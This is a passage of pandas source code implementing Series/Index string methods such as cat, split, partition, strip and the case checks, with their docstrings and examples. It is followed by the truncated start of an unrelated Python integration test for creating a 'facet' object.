# only allowing Series/Index/np.ndarray[1-dim] will greatly
# simply this function post-deprecation.
if not (
isinstance(nxt, (Series, Index))
or (isinstance(nxt, np.ndarray) and nxt.ndim == 1)
):
depr_warn = True
if not isinstance(nxt, (DataFrame, Series, Index, np.ndarray)):
# safety for non-persistent list-likes (e.g. iterators)
# do not map indexed/typed objects; info needed below
nxt = list(nxt)
# known types for which we can avoid deep inspection
no_deep = (
isinstance(nxt, np.ndarray) and nxt.ndim == 1
) or isinstance(nxt, (Series, Index))
# nested list-likes are forbidden:
# -> elements of nxt must not be list-like
is_legal = (no_deep and nxt.dtype == object) or all(
not is_list_like(x) for x in nxt
)
# DataFrame is false positive of is_legal
# because "x in df" returns column names
if not is_legal or isinstance(nxt, DataFrame):
raise TypeError(err_msg)
nxt, wnx = self._get_series_list(nxt, ignore_index=ignore_index)
los = los + nxt
join_warn = join_warn or wnx
if depr_warn:
warnings.warn(
"list-likes other than Series, Index, or "
"np.ndarray WITHIN another list-like are "
"deprecated and will be removed in a future "
"version.",
FutureWarning,
stacklevel=4,
)
return (los, join_warn)
elif all(not is_list_like(x) for x in others):
return ([Series(others, index=idx)], False)
raise TypeError(err_msg)
@forbid_nonstring_types(["bytes", "mixed", "mixed-integer"])
def cat(self, others=None, sep=None, na_rep=None, join=None):
"""
Concatenate strings in the Series/Index with given separator.
If `others` is specified, this function concatenates the Series/Index
and elements of `others` element-wise.
If `others` is not passed, then all values in the Series/Index are
concatenated into a single string with a given `sep`.
Parameters
----------
others : Series, Index, DataFrame, np.ndarray or list-like
Series, Index, DataFrame, np.ndarray (one- or two-dimensional) and
other list-likes of strings must have the same length as the
calling Series/Index, with the exception of indexed objects (i.e.
Series/Index/DataFrame) if `join` is not None.
If others is a list-like that contains a combination of Series,
Index or np.ndarray (1-dim), then all elements will be unpacked and
must satisfy the above criteria individually.
If others is None, the method returns the concatenation of all
strings in the calling Series/Index.
sep : str, default ''
The separator between the different elements/columns. By default
the empty string `''` is used.
na_rep : str or None, default None
Representation that is inserted for all missing values:
- If `na_rep` is None, and `others` is None, missing values in the
Series/Index are omitted from the result.
- If `na_rep` is None, and `others` is not None, a row containing a
missing value in any of the columns (before concatenation) will
have a missing value in the result.
join : {'left', 'right', 'outer', 'inner'}, default None
Determines the join-style between the calling Series/Index and any
Series/Index/DataFrame in `others` (objects without an index need
to match the length of the calling Series/Index). If None,
alignment is disabled, but this option will be removed in a future
version of pandas and replaced with a default of `'left'`. To
disable alignment, use `.values` on any Series/Index/DataFrame in
`others`.
.. versionadded:: 0.23.0
Returns
-------
str, Series or Index
If `others` is None, `str` is returned, otherwise a `Series/Index`
(same type as caller) of objects is returned.
See Also
--------
split : Split each string in the Series/Index.
join : Join lists contained as elements in the Series/Index.
Examples
--------
When not passing `others`, all values are concatenated into a single
string:
>>> s = pd.Series(['a', 'b', np.nan, 'd'])
>>> s.str.cat(sep=' ')
'a b d'
By default, NA values in the Series are ignored. Using `na_rep`, they
can be given a representation:
>>> s.str.cat(sep=' ', na_rep='?')
'a b ? d'
If `others` is specified, corresponding values are concatenated with
the separator. Result will be a Series of strings.
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',')
0 a,A
1 b,B
2 NaN
3 d,D
dtype: object
Missing values will remain missing in the result, but can again be
represented using `na_rep`
>>> s.str.cat(['A', 'B', 'C', 'D'], sep=',', na_rep='-')
0 a,A
1 b,B
2 -,C
3 d,D
dtype: object
If `sep` is not specified, the values are concatenated without
separation.
>>> s.str.cat(['A', 'B', 'C', 'D'], na_rep='-')
0 aA
1 bB
2 -C
3 dD
dtype: object
Series with different indexes can be aligned before concatenation. The
`join`-keyword works as in other methods.
>>> t = pd.Series(['d', 'a', 'e', 'c'], index=[3, 0, 4, 2])
>>> s.str.cat(t, join='left', na_rep='-')
0 aa
1 b-
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='outer', na_rep='-')
0 aa
1 b-
2 -c
3 dd
4 -e
dtype: object
>>>
>>> s.str.cat(t, join='inner', na_rep='-')
0 aa
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='right', na_rep='-')
3 dd
0 aa
4 -e
2 -c
dtype: object
For more examples, see :ref:`here <text.concatenate>`.
"""
from pandas import Index, Series, concat
if isinstance(others, str):
raise ValueError("Did you mean to supply a `sep` keyword?")
if sep is None:
sep = ""
if isinstance(self._orig, Index):
data = Series(self._orig, index=self._orig)
else: # Series
data = self._orig
# concatenate Series/Index with itself if no "others"
if others is None:
data = ensure_object(data)
na_mask = isna(data)
if na_rep is None and na_mask.any():
data = data[~na_mask]
elif na_rep is not None and na_mask.any():
data = np.where(na_mask, na_rep, data)
return sep.join(data)
try:
# turn anything in "others" into lists of Series
others, warn = self._get_series_list(others, ignore_index=(join is None))
except ValueError: # do not catch TypeError raised by _get_series_list
if join is None:
raise ValueError(
"All arrays must be same length, except "
"those having an index if `join` is not None"
)
else:
raise ValueError(
"If `others` contains arrays or lists (or "
"other list-likes without an index), these "
"must all be of the same length as the "
"calling Series/Index."
)
if join is None and warn:
warnings.warn(
"A future version of pandas will perform index "
"alignment when `others` is a Series/Index/"
"DataFrame (or a list-like containing one). To "
"disable alignment (the behavior before v.0.23) and "
"silence this warning, use `.values` on any Series/"
"Index/DataFrame in `others`. To enable alignment "
"and silence this warning, pass `join='left'|"
"'outer'|'inner'|'right'`. The future default will "
"be `join='left'`.",
FutureWarning,
stacklevel=3,
)
# if join is None, _get_series_list already force-aligned indexes
join = "left" if join is None else join
# align if required
if any(not data.index.equals(x.index) for x in others):
# Need to add keys for uniqueness in case of duplicate columns
others = concat(
others,
axis=1,
join=(join if join == "inner" else "outer"),
keys=range(len(others)),
sort=False,
copy=False,
)
data, others = data.align(others, join=join)
others = [others[x] for x in others] # again list of Series
all_cols = [ensure_object(x) for x in [data] + others]
na_masks = np.array([isna(x) for x in all_cols])
union_mask = np.logical_or.reduce(na_masks, axis=0)
if na_rep is None and union_mask.any():
# no na_rep means NaNs for all rows where any column has a NaN
# only necessary if there are actually any NaNs
result = np.empty(len(data), dtype=object)
np.putmask(result, union_mask, np.nan)
not_masked = ~union_mask
result[not_masked] = cat_safe([x[not_masked] for x in all_cols], sep)
elif na_rep is not None and union_mask.any():
# fill NaNs with na_rep in case there are actually any NaNs
all_cols = [
np.where(nm, na_rep, col) for nm, col in zip(na_masks, all_cols)
]
result = cat_safe(all_cols, sep)
else:
# no NaNs - can just concatenate
result = cat_safe(all_cols, sep)
if isinstance(self._orig, Index):
# add dtype for case that result is all-NA
result = Index(result, dtype=object, name=self._orig.name)
else: # Series
result = Series(
result, dtype=object, index=data.index, name=self._orig.name
)
return result
_shared_docs[
"str_split"
] = r"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the %(side)s,
at the specified delimiter string. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
pat : str, optional
String or regular expression to split on.
If not specified, split on whitespace.
n : int, default -1 (all)
Limit number of splits in output.
``None``, 0 and -1 will be interpreted as return all splits.
expand : bool, default False
    Expand the split strings into separate columns.
* If ``True``, return DataFrame/MultiIndex expanding dimensionality.
* If ``False``, return Series/Index, containing lists of strings.
Returns
-------
Series, Index, DataFrame or MultiIndex
Type matches caller unless ``expand=True`` (see Notes).
See Also
--------
Series.str.split : Split strings around given separator/delimiter.
Series.str.rsplit : Splits string around given separator/delimiter,
starting from the right.
Series.str.join : Join lists contained as elements in the Series/Index
with passed delimiter.
str.split : Standard library version for split.
str.rsplit : Standard library version for rsplit.
Notes
-----
The handling of the `n` keyword depends on the number of found splits:
- If found splits > `n`, make first `n` splits only
- If found splits <= `n`, make all splits
- If for a certain row the number of found splits < `n`,
append `None` for padding up to `n` if ``expand=True``
If using ``expand=True``, Series and Index callers return DataFrame and
MultiIndex objects, respectively.
Examples
--------
>>> s = pd.Series(["this is a regular sentence",
... "https://docs.python.org/3/tutorial/index.html",
    ...                np.nan])
    >>> s
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html
2 NaN
dtype: object
In the default setting, the string is split by whitespace.
>>> s.str.split()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
Without the `n` parameter, the outputs of `rsplit` and `split`
are identical.
>>> s.str.rsplit()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `n` parameter can be used to limit the number of splits on the
delimiter. The outputs of `split` and `rsplit` are different.
>>> s.str.split(n=2)
0 [this, is, a regular sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
>>> s.str.rsplit(n=2)
0 [this is a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `pat` parameter can be used to split by other characters.
>>> s.str.split(pat = "/")
0 [this is a regular sentence]
1 [https:, , docs.python.org, 3, tutorial, index...
2 NaN
dtype: object
When using ``expand=True``, the split elements will expand out into
separate columns. If NaN is present, it is propagated throughout
the columns during the split.
    >>> s.str.split(expand=True)
                                                   0     1     2        3         4
    0                                           this    is     a  regular  sentence
    1  https://docs.python.org/3/tutorial/index.html  None  None     None      None
    2                                            NaN   NaN   NaN      NaN       NaN
For slightly more complex use cases like splitting the html document name
from a url, a combination of parameter settings can be used.
>>> s.str.rsplit("/", n=1, expand=True)
0 1
0 this is a regular sentence None
1 https://docs.python.org/3/tutorial index.html
2 NaN NaN
Remember to escape special characters when explicitly using regular
expressions.
>>> s = pd.Series(["1+1=2"])
>>> s.str.split(r"\+|=", expand=True)
0 1 2
0 1 1 2
"""
@Appender(_shared_docs["str_split"] % {"side": "beginning", "method": "split"})
@forbid_nonstring_types(["bytes"])
def split(self, pat=None, n=-1, expand=False):
result = str_split(self._parent, pat, n=n)
return self._wrap_result(result, expand=expand)
@Appender(_shared_docs["str_split"] % {"side": "end", "method": "rsplit"})
@forbid_nonstring_types(["bytes"])
def rsplit(self, pat=None, n=-1, expand=False):
result = str_rsplit(self._parent, pat, n=n)
return self._wrap_result(result, expand=expand)
_shared_docs[
"str_partition"
] = """
Split the string at the %(side)s occurrence of `sep`.
This method splits the string at the %(side)s occurrence of `sep`,
and returns 3 elements containing the part before the separator,
the separator itself, and the part after the separator.
If the separator is not found, return %(return)s.
Parameters
----------
sep : str, default whitespace
String to split on.
pat : str, default whitespace
.. deprecated:: 0.24.0
Use ``sep`` instead
expand : bool, default True
If True, return DataFrame/MultiIndex expanding dimensionality.
If False, return Series/Index.
Returns
-------
DataFrame/MultiIndex or Series/Index of objects
See Also
--------
%(also)s
Series.str.split : Split strings around given separators.
str.partition : Standard library version.
Examples
--------
>>> s = pd.Series(['Linda van der Berg', 'George Pitt-Rivers'])
>>> s
0 Linda van der Berg
1 George Pitt-Rivers
dtype: object
>>> s.str.partition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by the last space instead of the first one:
>>> s.str.rpartition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by something different than a space:
>>> s.str.partition('-')
0 1 2
0 Linda van der Berg
1 George Pitt - Rivers
To return a Series containing tuples instead of a DataFrame:
>>> s.str.partition('-', expand=False)
0 (Linda van der Berg, , )
1 (George Pitt, -, Rivers)
dtype: object
Also available on indices:
>>> idx = pd.Index(['X 123', 'Y 999'])
>>> idx
Index(['X 123', 'Y 999'], dtype='object')
Which will create a MultiIndex:
>>> idx.str.partition()
MultiIndex([('X', ' ', '123'),
('Y', ' ', '999')],
dtype='object')
Or an index with tuples with ``expand=False``:
>>> idx.str.partition(expand=False)
Index([('X', ' ', '123'), ('Y', ' ', '999')], dtype='object')
"""
@Appender(
_shared_docs["str_partition"]
% {
"side": "first",
"return": "3 elements containing the string itself, followed by two "
"empty strings",
"also": "rpartition : Split the string at the last occurrence of " "`sep`.",
}
)
@deprecate_kwarg(old_arg_name="pat", new_arg_name="sep")
@forbid_nonstring_types(["bytes"])
def partition(self, sep=" ", expand=True):
f = lambda x: x.partition(sep)
result = _na_map(f, self._parent)
return self._wrap_result(result, expand=expand)
@Appender(
_shared_docs["str_partition"]
% {
"side": "last",
"return": "3 elements containing two empty strings, followed by the "
"string itself",
"also": "partition : Split the string at the first occurrence of " "`sep`.",
}
)
@deprecate_kwarg(old_arg_name="pat", new_arg_name="sep")
@forbid_nonstring_types(["bytes"])
def rpartition(self, sep=" ", expand=True):
f = lambda x: x.rpartition(sep)
result = _na_map(f, self._parent)
return self._wrap_result(result, expand=expand)
@copy(str_get)
def get(self, i):
result = str_get(self._parent, i)
return self._wrap_result(result)
@copy(str_join)
@forbid_nonstring_types(["bytes"])
def join(self, sep):
result = str_join(self._parent, sep)
return self._wrap_result(result)
@copy(str_contains)
@forbid_nonstring_types(["bytes"])
def contains(self, pat, case=True, flags=0, na=np.nan, regex=True):
result = str_contains(
self._parent, pat, case=case, flags=flags, na=na, regex=regex
)
return self._wrap_result(result, fill_value=na)
@copy(str_match)
@forbid_nonstring_types(["bytes"])
def match(self, pat, case=True, flags=0, na=np.nan):
result = str_match(self._parent, pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na)
@copy(str_replace)
@forbid_nonstring_types(["bytes"])
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=True):
result = str_replace(
self._parent, pat, repl, n=n, case=case, flags=flags, regex=regex
)
return self._wrap_result(result)
@copy(str_repeat)
@forbid_nonstring_types(["bytes"])
def repeat(self, repeats):
result = str_repeat(self._parent, repeats)
return self._wrap_result(result)
@copy(str_pad)
@forbid_nonstring_types(["bytes"])
def pad(self, width, side="left", fillchar=" "):
result = str_pad(self._parent, width, side=side, fillchar=fillchar)
return self._wrap_result(result)
_shared_docs[
"str_pad"
] = """
    Fill the %(side)s side of strings in the Series/Index with an
    additional character. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with ``fillchar``
fillchar : str
Additional character for filling, default is whitespace
Returns
-------
filled : Series/Index of objects
"""
@Appender(_shared_docs["str_pad"] % dict(side="left and right", method="center"))
@forbid_nonstring_types(["bytes"])
def center(self, width, fillchar=" "):
return self.pad(width, side="both", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % dict(side="right", method="ljust"))
@forbid_nonstring_types(["bytes"])
def ljust(self, width, fillchar=" "):
return self.pad(width, side="right", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % dict(side="left", method="rjust"))
@forbid_nonstring_types(["bytes"])
def rjust(self, width, fillchar=" "):
return self.pad(width, side="left", fillchar=fillchar)
@forbid_nonstring_types(["bytes"])
def zfill(self, width):
"""
Pad strings in the Series/Index by prepending '0' characters.
Strings in the Series/Index are padded with '0' characters on the
left of the string to reach a total string length `width`. Strings
in the Series/Index with length greater or equal to `width` are
unchanged.
Parameters
----------
width : int
        Minimum length of resulting string; strings with length less
        than `width` will be prepended with '0' characters.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character.
Series.str.ljust : Fills the right side of strings with an arbitrary
character.
Series.str.pad : Fills the specified sides of strings with an arbitrary
character.
        Series.str.center : Fills both sides of strings with an arbitrary
character.
Notes
-----
Differs from :meth:`str.zfill` which has special handling
for '+'/'-' in the string.
Examples
--------
>>> s = pd.Series(['-1', '1', '1000', 10, np.nan])
>>> s
0 -1
1 1
2 1000
3 10
4 NaN
dtype: object
Note that ``10`` and ``NaN`` are not strings, therefore they are
converted to ``NaN``. The minus sign in ``'-1'`` is treated as a
regular character and the zero is added to the left of it
(:meth:`str.zfill` would have moved it to the left). ``1000``
remains unchanged as it is longer than `width`.
>>> s.str.zfill(3)
0 0-1
1 001
2 1000
3 NaN
4 NaN
dtype: object
"""
result = str_pad(self._parent, width, side="left", fillchar="0")
return self._wrap_result(result)
@copy(str_slice)
def slice(self, start=None, stop=None, step=None):
result = str_slice(self._parent, start, stop, step)
return self._wrap_result(result)
@copy(str_slice_replace)
@forbid_nonstring_types(["bytes"])
def slice_replace(self, start=None, stop=None, repl=None):
result = str_slice_replace(self._parent, start, stop, repl)
return self._wrap_result(result)
@copy(str_decode)
def decode(self, encoding, errors="strict"):
# need to allow bytes here
result = str_decode(self._parent, encoding, errors)
return self._wrap_result(result)
@copy(str_encode)
@forbid_nonstring_types(["bytes"])
def encode(self, encoding, errors="strict"):
result = str_encode(self._parent, encoding, errors)
return self._wrap_result(result)
_shared_docs[
"str_strip"
] = r"""
Remove leading and trailing characters.
Strip whitespaces (including newlines) or a set of specified characters
from each string in the Series/Index from %(side)s.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
to_strip : str or None, default None
Specifying the set of characters to be removed.
All combinations of this set of characters will be stripped.
If None then whitespaces are removed.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.strip : Remove leading and trailing characters in Series/Index.
Series.str.lstrip : Remove leading characters in Series/Index.
Series.str.rstrip : Remove trailing characters in Series/Index.
Examples
--------
>>> s = pd.Series(['1. Ant. ', '2. Bee!\n', '3. Cat?\t', np.nan])
>>> s
0 1. Ant.
1 2. Bee!\n
2 3. Cat?\t
3 NaN
dtype: object
>>> s.str.strip()
0 1. Ant.
1 2. Bee!
2 3. Cat?
3 NaN
dtype: object
>>> s.str.lstrip('123.')
0 Ant.
1 Bee!\n
2 Cat?\t
3 NaN
dtype: object
>>> s.str.rstrip('.!? \n\t')
0 1. Ant
1 2. Bee
2 3. Cat
3 NaN
dtype: object
>>> s.str.strip('123.!? \n\t')
0 Ant
1 Bee
2 Cat
3 NaN
dtype: object
"""
@Appender(
_shared_docs["str_strip"] % dict(side="left and right sides", method="strip")
)
@forbid_nonstring_types(["bytes"])
def strip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="both")
return self._wrap_result(result)
@Appender(_shared_docs["str_strip"] % dict(side="left side", method="lstrip"))
@forbid_nonstring_types(["bytes"])
def lstrip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="left")
return self._wrap_result(result)
@Appender(_shared_docs["str_strip"] % dict(side="right side", method="rstrip"))
@forbid_nonstring_types(["bytes"])
def rstrip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="right")
return self._wrap_result(result)
@copy(str_wrap)
@forbid_nonstring_types(["bytes"])
def wrap(self, width, **kwargs):
result = str_wrap(self._parent, width, **kwargs)
return self._wrap_result(result)
@copy(str_get_dummies)
@forbid_nonstring_types(["bytes"])
def get_dummies(self, sep="|"):
# we need to cast to Series of strings as only that has all
# methods available for making the dummies...
data = self._orig.astype(str) if self._is_categorical else self._parent
result, name = str_get_dummies(data, sep)
return self._wrap_result(
result, use_codes=(not self._is_categorical), name=name, expand=True
)
@copy(str_translate)
@forbid_nonstring_types(["bytes"])
def translate(self, table):
result = str_translate(self._parent, table)
return self._wrap_result(result)
count = _pat_wrapper(str_count, flags=True, name="count")
startswith = _pat_wrapper(str_startswith, na=True, name="startswith")
endswith = _pat_wrapper(str_endswith, na=True, name="endswith")
findall = _pat_wrapper(str_findall, flags=True, name="findall")
@copy(str_extract)
@forbid_nonstring_types(["bytes"])
def extract(self, pat, flags=0, expand=True):
return str_extract(self, pat, flags=flags, expand=expand)
@copy(str_extractall)
@forbid_nonstring_types(["bytes"])
def extractall(self, pat, flags=0):
return str_extractall(self._orig, pat, flags=flags)
_shared_docs[
"find"
] = """
    Return %(side)s indexes in each string in the Series/Index
    where the substring is fully contained between [start:end].
Return -1 on failure. Equivalent to standard :meth:`str.%(method)s`.
Parameters
----------
sub : str
Substring being searched
start : int
Left edge index
end : int
Right edge index
Returns
-------
found : Series/Index of integer values
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["find"]
% dict(
side="lowest",
method="find",
also="rfind : Return highest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def find(self, sub, start=0, end=None):
result = str_find(self._parent, sub, start=start, end=end, side="left")
return self._wrap_result(result)
@Appender(
_shared_docs["find"]
% dict(
side="highest",
method="rfind",
also="find : Return lowest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def rfind(self, sub, start=0, end=None):
result = str_find(self._parent, sub, start=start, end=end, side="right")
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def normalize(self, form):
"""
Return the Unicode normal form for the strings in the Series/Index.
For more information on the forms, see the
:func:`unicodedata.normalize`.
Parameters
----------
form : {'NFC', 'NFKC', 'NFD', 'NFKD'}
Unicode form
Returns
-------
normalized : Series/Index of objects
"""
import unicodedata
f = lambda x: unicodedata.normalize(form, x)
result = _na_map(f, self._parent)
return self._wrap_result(result)
_shared_docs[
"index"
] = """
    Return %(side)s indexes in each string where the substring is
    fully contained between [start:end]. This is the same as
``str.%(similar)s`` except instead of returning -1, it raises a ValueError
when the substring is not found. Equivalent to standard ``str.%(method)s``.
Parameters
----------
sub : str
Substring being searched
start : int
Left edge index
end : int
Right edge index
Returns
-------
found : Series/Index of objects
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["index"]
% dict(
side="lowest",
similar="find",
method="index",
also="rindex : Return highest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def index(self, sub, start=0, end=None):
result = str_index(self._parent, sub, start=start, end=end, side="left")
return self._wrap_result(result)
@Appender(
_shared_docs["index"]
% dict(
side="highest",
similar="rfind",
method="rindex",
also="index : Return lowest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def rindex(self, sub, start=0, end=None):
result = str_index(self._parent, sub, start=start, end=end, side="right")
return self._wrap_result(result)
_shared_docs[
"len"
] = """
Compute the length of each element in the Series/Index. The element may be
a sequence (such as a string, tuple or list) or a collection
(such as a dictionary).
Returns
-------
Series or Index of int
A Series or Index of integer values indicating the length of each
element in the Series or Index.
See Also
--------
str.len : Python built-in function returning the length of an object.
Series.size : Returns the length of the Series.
Examples
--------
Returns the length (number of characters) in a string. Returns the
number of entries for dictionaries, lists or tuples.
>>> s = pd.Series(['dog',
... '',
... 5,
... {'foo' : 'bar'},
... [2, 3, 5, 7],
... ('one', 'two', 'three')])
>>> s
0 dog
1
2 5
3 {'foo': 'bar'}
4 [2, 3, 5, 7]
5 (one, two, three)
dtype: object
>>> s.str.len()
0 3.0
1 0.0
2 NaN
3 1.0
4 4.0
5 3.0
dtype: float64
"""
len = _noarg_wrapper(
len, docstring=_shared_docs["len"], forbidden_types=None, dtype=int
)
_shared_docs[
"casemethods"
] = """
Convert strings in the Series/Index to %(type)s.
%(version)s
Equivalent to :meth:`str.%(method)s`.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.lower : Converts all characters to lowercase.
Series.str.upper : Converts all characters to uppercase.
Series.str.title : Converts first character of each word to uppercase and
remaining to lowercase.
Series.str.capitalize : Converts first character to uppercase and
remaining to lowercase.
Series.str.swapcase : Converts uppercase to lowercase and lowercase to
uppercase.
    Series.str.casefold : Removes all case distinctions in the string.
Examples
--------
>>> s = pd.Series(['lower', 'CAPITALS', 'this is a sentence', 'SwApCaSe'])
>>> s
0 lower
1 CAPITALS
2 this is a sentence
3 SwApCaSe
dtype: object
>>> s.str.lower()
0 lower
1 capitals
2 this is a sentence
3 swapcase
dtype: object
>>> s.str.upper()
0 LOWER
1 CAPITALS
2 THIS IS A SENTENCE
3 SWAPCASE
dtype: object
>>> s.str.title()
0 Lower
1 Capitals
2 This Is A Sentence
3 Swapcase
dtype: object
>>> s.str.capitalize()
0 Lower
1 Capitals
2 This is a sentence
3 Swapcase
dtype: object
>>> s.str.swapcase()
0 LOWER
1 capitals
2 THIS IS A SENTENCE
3 sWaPcAsE
dtype: object
"""
# _doc_args holds dict of strings to use in substituting casemethod docs
_doc_args = {} # type: Dict[str, Dict[str, str]]
_doc_args["lower"] = dict(type="lowercase", method="lower", version="")
_doc_args["upper"] = dict(type="uppercase", method="upper", version="")
_doc_args["title"] = dict(type="titlecase", method="title", version="")
_doc_args["capitalize"] = dict(
type="be capitalized", method="capitalize", version=""
)
_doc_args["swapcase"] = dict(type="be swapcased", method="swapcase", version="")
_doc_args["casefold"] = dict(
type="be casefolded",
method="casefold",
version="\n .. versionadded:: 0.25.0\n",
)
lower = _noarg_wrapper(
lambda x: x.lower(),
name="lower",
docstring=_shared_docs["casemethods"] % _doc_args["lower"],
)
upper = _noarg_wrapper(
lambda x: x.upper(),
name="upper",
docstring=_shared_docs["casemethods"] % _doc_args["upper"],
)
title = _noarg_wrapper(
lambda x: x.title(),
name="title",
docstring=_shared_docs["casemethods"] % _doc_args["title"],
)
capitalize = _noarg_wrapper(
lambda x: x.capitalize(),
name="capitalize",
docstring=_shared_docs["casemethods"] % _doc_args["capitalize"],
)
swapcase = _noarg_wrapper(
lambda x: x.swapcase(),
name="swapcase",
docstring=_shared_docs["casemethods"] % _doc_args["swapcase"],
)
casefold = _noarg_wrapper(
lambda x: x.casefold(),
name="casefold",
docstring=_shared_docs["casemethods"] % _doc_args["casefold"],
)
_shared_docs[
"ismethods"
] = """
Check whether all characters in each string are %(type)s.
This is equivalent to running the Python string method
:meth:`str.%(method)s` for each element of the Series/Index. If a string
has zero characters, ``False`` is returned for that check.
Returns
-------
Series or Index of bool
Series or Index of boolean values with the same length as the original
Series/Index.
See Also
--------
Series.str.isalpha : Check whether all characters are alphabetic.
Series.str.isnumeric : Check whether all characters are numeric.
Series.str.isalnum : Check whether all characters are alphanumeric.
Series.str.isdigit : Check whether all characters are digits.
Series.str.isdecimal : Check whether all characters are decimal.
Series.str.isspace : Check whether all characters are whitespace.
Series.str.islower : Check whether all characters are lowercase.
Series.str.isupper : Check whether all characters are uppercase.
Series.str.istitle : Check whether all characters are titlecase.
Examples
--------
**Checks for Alphabetic and Numeric Characters**
>>> s1 = pd.Series(['one', 'one1', '1', ''])
>>> s1.str.isalpha()
0 True
1 False
2 False
3 False
dtype: bool
>>> s1.str.isnumeric()
0 False
1 False
2 True
3 False
dtype: bool
>>> s1.str.isalnum()
0 True
1 True
2 True
3 False
dtype: bool
Note that checks against characters mixed with any additional punctuation
or whitespace will evaluate to false for an alphanumeric check.
>>> s2 = pd.Series(['A B', '1.5', '3,000'])
>>> s2.str.isalnum()
0 False
1 False
2 False
dtype: bool
**More Detailed Checks for Numeric Characters**
There are several different but overlapping sets of numeric characters that
can be checked for.
>>> s3 = pd.Series(['23', '³', '⅕', ''])
The ``s3.str.isdecimal`` method checks for characters used to form numbers
in base 10.
>>> s3.str.isdecimal()
0 True
1 False
2 False
3 False
dtype: bool
    The ``s3.str.isdigit`` method is the same as ``s3.str.isdecimal`` but also
includes special digits, like superscripted and subscripted digits in
unicode.
>>> s3.str.isdigit()
0 True
1 True
2 False
3 False
dtype: bool
    The ``s3.str.isnumeric`` method is the same as ``s3.str.isdigit`` but also
includes other characters that can represent quantities such as unicode
fractions.
>>> s3.str.isnumeric()
0 True
1 True
2 True
3 False
dtype: bool
**Checks for Whitespace**
>>> s4 = pd.Series([' ', '\\t\\r\\n ', ''])
>>> s4.str.isspace()
0 True
1 True
2 False
dtype: bool
**Checks for Character Case**
>>> s5 = pd.Series(['leopard', 'Golden Eagle', 'SNAKE', ''])
>>> s5.str.islower()
0 True
1 False
2 False
3 False
dtype: bool
>>> s5.str.isupper()
0 False
1 False
2 True
3 False
dtype: bool
The ``s5.str.istitle`` method checks for whether all words are in title
case (whether only the first letter of each word is capitalized). Words are
    assumed to be any sequence of non-numeric characters separated by
whitespace characters.
>>> s5.str.istitle()
0 False
1 True
2 False
3 False
dtype: bool
"""
_doc_args["isalnum"] = dict(type="alphanumeric", method="isalnum")
_doc_args["isalpha"] = dict(type="alphabetic", method="isalpha")
_doc_args["isdigit"] = dict(type="digits", method="isdigit")
_doc_args["isspace"] = dict(type="whitespace", method="isspace")
_doc_args["islower"] = dict(type="lowercase", method="islower")
_doc_args["isupper"] = dict(type="uppercase", method="isupper")
_doc_args["istitle"] = dict(type="titlecase", method="istitle")
_doc_args["isnumeric"] = dict(type="numeric", method="isnumeric")
_doc_args["isdecimal"] = dict(type="decimal", method="isdecimal")
isalnum = _noarg_wrapper(
lambda x: x.isalnum(),
name="isalnum",
docstring=_shared_docs["ismethods"] % _doc_args["isalnum"],
)
isalpha = _noarg_wrapper(
lambda x: x.isalpha(),
name="isalpha",
docstring=_shared_docs["ismethods"] % _doc_args["isalpha"],
)
isdigit = _noarg_wrapper(
lambda x: x.isdigit(),
name="isdigit",
docstring=_shared_docs["ismethods"] % _doc_args["isdigit"],
)
isspace = _noarg_wrapper(
lambda x: x.isspace(),
name="isspace",
docstring=_shared_docs["ismethods"] % _doc_args["isspace"],
)
islower = _noarg_wrapper(
lambda x: x.islower(),
name="islower",
docstring=_shared_docs["ismethods"] % _doc_args["islower"],
)
isupper = _noarg_wrapper(
lambda x: x.isupper(),
name="isupper",
docstring=_shared_docs["ismethods"] % _doc_args["isupper"],
)
istitle = _noarg_wrapper(
lambda x: x.istitle(),
name="istitle",
docstring=_shared_docs["ismethods"] % _doc_args["istitle"],
)
isnumeric = _noarg_wrapper(
lambda x: x.isnumeric(),
name="isnumeric",
docstring=_shared_docs["ismethods"] % _doc_args["isnumeric"],
)
isdecimal = _noarg_wrapper(
lambda x: x.isdecimal(),
name="isdecimal",
docstring=_shared_docs["ismethods"] % _doc_args["isdecimal"],
)
@classmethod
def _make_accessor(cls, data):
cls._validate(data)
return cls(data)
| apache-2.0 | -8,466,611,931,052,144,000 | 29.541679 | 88 | 0.565437 | false |
magenta-aps/mox | oio_rest/tests/test_integration_create_facet.py | 1 | 1390 | #
# Copyright (c) 2017-2018, Magenta ApS
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
from tests.test_integration_create_helper import TestCreateObject
class TestCreateFacet(TestCreateObject):
def setUp(self):
super(TestCreateFacet, self).setUp()
def test_create_facet(self):
facet = {
